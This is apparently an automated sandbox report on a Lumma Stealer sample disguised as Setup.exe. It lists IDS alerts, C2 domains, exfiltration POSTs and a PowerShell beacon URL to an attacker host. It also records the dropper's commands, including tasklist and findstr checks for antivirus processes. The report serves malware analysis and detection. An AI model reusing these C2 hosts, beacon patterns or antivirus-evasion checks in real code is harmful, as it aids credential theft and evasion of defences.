Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2059043 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) : 192.168.2.5:53020 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059035 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) : 192.168.2.5:63819 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) : 192.168.2.5:65405 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059049 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) : 192.168.2.5:59614 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059041 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) : 192.168.2.5:61126 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059051 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) : 192.168.2.5:50381 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059037 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) : 192.168.2.5:60134 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059057 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) : 192.168.2.5:56069 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49882 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49882 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49871 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49970 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49962 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49962 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49990 -> 104.21.32.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: crowdwarek.shop
Source: Malware configuration extractor	URLs: handscreamny.shop
Source: Malware configuration extractor	URLs: soundtappysk.shop
Source: Malware configuration extractor	URLs: throwlette.cyou
Source: Malware configuration extractor	URLs: robinsharez.shop
Source: Malware configuration extractor	URLs: apporholis.shop
Source: Malware configuration extractor	URLs: versersleep.shop
Source: Malware configuration extractor	URLs: chipdonkeruz.shop
Source: Malware configuration extractor	URLs: femalsabler.shop

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

File created: 5UHUPPG78GSXH8YIM9UYVJ0NVOM81L5.exe.13.dr

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: femalsabler.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: robinsharez.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: throwlette.cyou replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dfgh.online replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vqOdvwsaFkSmirvHugHUcNrMgvS.vqOdvwsaFkSmirvHugHUcNrMgvS replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: versersleep.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: chipdonkeruz.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: apporholis.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: soundtappysk.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: crowdwarek.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: handscreamny.shop replaycode: Name error (3)

Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 185.161.251.21 185.161.251.21
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49871 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49882 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49962 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49970 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49989 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49987 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49985 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49991 -> 185.161.251.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49992 -> 172.67.162.153:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49978 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49990 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49988 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L6EU88F0YQA25X2XTF3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12840Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L16E52NWRM8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15034Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HXQFBOVAWPQP4XL52User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20560Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZW4IP765VOG0RJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5457Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UXTCS1LNCOPNHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 918Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZIFZHGEDLTJTDBJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 578280Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
Source: global traffic	HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipgonuh.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
Source: global traffic	HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipgonuh.shop

Source: global traffic	DNS traffic detected: DNS query: vqOdvwsaFkSmirvHugHUcNrMgvS.vqOdvwsaFkSmirvHugHUcNrMgvS
Source: global traffic	DNS traffic detected: DNS query: throwlette.cyou
Source: global traffic	DNS traffic detected: DNS query: soundtappysk.shop
Source: global traffic	DNS traffic detected: DNS query: femalsabler.shop
Source: global traffic	DNS traffic detected: DNS query: apporholis.shop
Source: global traffic	DNS traffic detected: DNS query: crowdwarek.shop
Source: global traffic	DNS traffic detected: DNS query: versersleep.shop
Source: global traffic	DNS traffic detected: DNS query: chipdonkeruz.shop
Source: global traffic	DNS traffic detected: DNS query: handscreamny.shop
Source: global traffic	DNS traffic detected: DNS query: robinsharez.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sputnik-1985.com
Source: global traffic	DNS traffic detected: DNS query: cegu.shop
Source: global traffic	DNS traffic detected: DNS query: klipgonuh.shop
Source: global traffic	DNS traffic detected: DNS query: dfgh.online

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Jan 2025 22:28:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W4MyY3IwfhseXtGKV8TzkaEgFtXJRmrZmOxu8%2BaSnrg0sQY13vNschiAhRUe8z9tpHdPI%2Bpk1pOgDIXeIgBeEmy0XX6ZpfOA1D8gqh2SRwRXOaAlC1BiRNsbefurvIzNgA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90001a34d94c7d0b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1832&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2864&recv_bytes=818&delivery_rate=1553191&cwnd=227&unsent_bytes=0&cid=29b883c1b24f4a73&ts=240&x=0"

Source: Setup.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000011.00000002.2951957964.000000000324D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Vulnerability.com.2.dr, Computing.9.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Vulnerability.com.2.dr, Computing.9.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Vulnerability.com.2.dr, Computing.9.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Vulnerability.com.2.dr, Computing.9.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Vulnerability.com.2.dr, Computing.9.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Setup.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: Setup.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Setup.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: Setup.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: Setup.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: Setup.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Setup.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: Setup.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: Setup.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000011.00000002.2956214341.000000000614D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Setup.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: Vulnerability.com.2.dr, Computing.9.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Setup.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: Setup.exe	String found in binary or memory: http://ocsp.sectigo.com0D
Source: Vulnerability.com.2.dr, Computing.9.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Vulnerability.com.2.dr, Computing.9.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Vulnerability.com.2.dr, Computing.9.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000011.00000002.2952472726.0000000005246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.2952472726.00000000050F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Vulnerability.com.2.dr, Computing.9.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Vulnerability.com.2.dr, Computing.9.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Amcache.hve.13.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000011.00000002.2952472726.0000000005246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Vulnerability.com, 0000000D.00000000.2096014206.0000000000815000.00000002.00000001.01000000.00000008.sdmp, Affects.9.dr, Vulnerability.com.2.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: powershell.exe, 00000011.00000002.2952472726.00000000050F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000011.00000002.2956214341.000000000614D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.2956214341.000000000614D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.2956214341.000000000614D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: 5UHUPPG78GSXH8YIM9UYVJ0NVOM81L5.exe.13.dr	String found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
Source: powershell.exe, 00000011.00000002.2952472726.0000000005246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online
Source: powershell.exe, 00000011.00000002.2951957964.0000000003210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: powershell.exe, 00000011.00000002.2952472726.0000000005246000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2959149859.0000000007823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
Source: powershell.exe, 00000011.00000002.2952298749.0000000003470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compname=
Source: powershell.exe, 00000011.00000002.2952472726.0000000005246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.2952472726.000000000540B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000011.00000002.2956214341.000000000614D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Setup.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: Vulnerability.com.2.dr, Computing.9.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: 5UHUPPG78GSXH8YIM9UYVJ0NVOM81L5.exe.13.dr	String found in binary or memory: https://www.cloudflare.com/favicon.ico
Source: Computing.9.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49962 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.153:443 -> 192.168.2.5:49992 version: TLS 1.2

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,

0_2_00403883

Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\VaryingTunes	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\BeveragesLecture	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\ExpansionPaid	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\EventsShopzilla	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004074BB	0_2_004074BB

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\Desktop\Setup.exe

Code function: String function: 004062A3 appears 57 times

Source: Setup.exe

Static PE information: invalid certificate

Source: Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@30/31@15/4

Source: C:\Users\user\Desktop\Setup.exe

0_2_004044A5

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\Desktop\Setup.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cdt

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4612:120:WilError_03

Source: C:\Users\user\Desktop\Setup.exe

File created: C:\Users\user\AppData\Local\Temp\nsdF117.tmp

Jump to behavior

Source: Setup.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\Setup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Setup.exe	Virustotal: Detection: 35%
Source: Setup.exe	ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\Setup.exe

File read: C:\Users\user\Desktop\Setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Pro Pro.cmd & Pro.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
